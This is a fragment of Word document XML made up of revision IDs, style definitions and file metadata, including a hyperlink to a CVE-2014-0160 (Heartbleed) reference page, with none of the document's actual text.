    <w:rsid w:val="00ED62CA"/>
    <w:rsid w:val="00EE156F"/>
    <w:rsid w:val="00EF4264"/>
    <w:rsid w:val="00EF724A"/>
    <w:rsid w:val="00F02B2A"/>
    <w:rsid w:val="00F05598"/>
    <w:rsid w:val="00F14072"/>
    <w:rsid w:val="00F21CD1"/>
    <w:rsid w:val="00F331B0"/>
    <w:rsid w:val="00F37C5F"/>
    <w:rsid w:val="00F401C2"/>
    <w:rsid w:val="00F647BD"/>
    <w:rsid w:val="00F667CD"/>
    <w:rsid w:val="00F66A96"/>
    <w:rsid w:val="00F70868"/>
    <w:rsid w:val="00FA36C7"/>
    <w:rsid w:val="00FA642A"/>
    <w:rsid w:val="00FA75F4"/>
    <w:rsid w:val="00FB1212"/>
    <w:rsid w:val="00FB2AD6"/>
    <w:rsid w:val="00FB7FFA"/>
    <w:rsid w:val="00FC1ECD"/>
    <w:rsid w:val="00FD4CF4"/>
    <w:rsid w:val="00FD6827"/>
    <w:rsid w:val="00FE5E98"/>
    <w:rsid w:val="00FF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7231E"/>
  <w15:docId w15:val="{6561FAEF-6F17-4E3C-93E2-3B01CF80C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8C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D6EBD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0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D6EBD"/>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="004D094A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8D5D3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D5D3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345B7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345B7E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00345B7E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440B6B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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A72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A727E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54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1979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83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562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4834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3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hyperlink" Target="https://www.cvedetails.com/cve/CVE-2014-0160/?q=CVE-2014-0160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endnotes" Target="endnotes.xml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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.gif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990F-8C9A-4CF0-8B14-A7B0AAC4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</TotalTime>
  <Pages>35</Pages>
  <Words>3074</Words>
  <Characters>17525</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>146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e0</dc:creator>
  <cp:lastModifiedBy>KITRI</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <cp:lastPrinted>2020-12-22T14:34:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-08T06:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-15T08:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>